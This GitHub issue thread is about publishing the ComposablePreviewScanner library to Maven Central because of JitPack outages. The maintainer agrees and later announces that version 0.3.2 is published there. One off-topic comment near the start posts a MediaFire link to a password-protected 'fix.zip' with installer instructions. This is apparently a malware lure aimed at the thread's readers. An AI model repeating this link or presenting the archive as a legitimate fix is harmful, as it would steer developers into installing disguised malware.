### ISSUE TITLE
Publish library to Maven Central

### ISSUE THREAD

**Issue by erawhctim** [sergio-sastre/ComposablePreviewScanner#26]
Is this feasible? jitpack often goes down and can negatively impacts project builds that include jitpack-provided dependencies.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sergio-sastre** [comment]
@erawhctim Thanks for your feedback!

Yes, it should be feasible.
Although it does not happen often (I‘ve experience issues 2 times in the last 3 years) I‘m aware jitpack was on 15th August 13h down.

Since this lib is widely used with almost 30k downloads monthly, it makes sense to also publish on maven central.

With jitpack it is really straightforward to publish though and maven central… well 😅
So I‘ll try to release in both at the beginning at least.

However, I think it might still take 1 month till I do it., I’m currently busy with other stuff. Would it be fine?

**Comment by erawhctim** [comment]
Sure, not a huge rush for me personally, that'd be great

**Comment by GrahamParvinkarimi** [comment]
@sergio-sastre I am also in favor of this request to publish the tool to Maven Central. I love the potential of this tool and I've been able to use it via JitPack in personal projects. I'm now looking to pull it into an organizational project and running into some proxy concerns/issues related to JitPack -- having this published to Maven Central would greatly simplify this process. Thanks in advance!

**Comment by sergio-sastre** [comment]
Sure! I will prioritize this. 
However, I’ll be on holidays in a couple of days till the end of September, so it might not happen till the beginning of October.

**Comment by sergio-sastre** [comment]
So... took a while but it is done!

from 0.3.2 on, I'll deploy not only to Jitpack, but to Maven Central as well.

Please keep in mind that currently, the only version deployed to Maven Central is 0.3.2

**Comment by erawhctim** [comment]
amazing, thank you!

**Comment by GrahamParvinkarimi** [comment]
Thank you!!
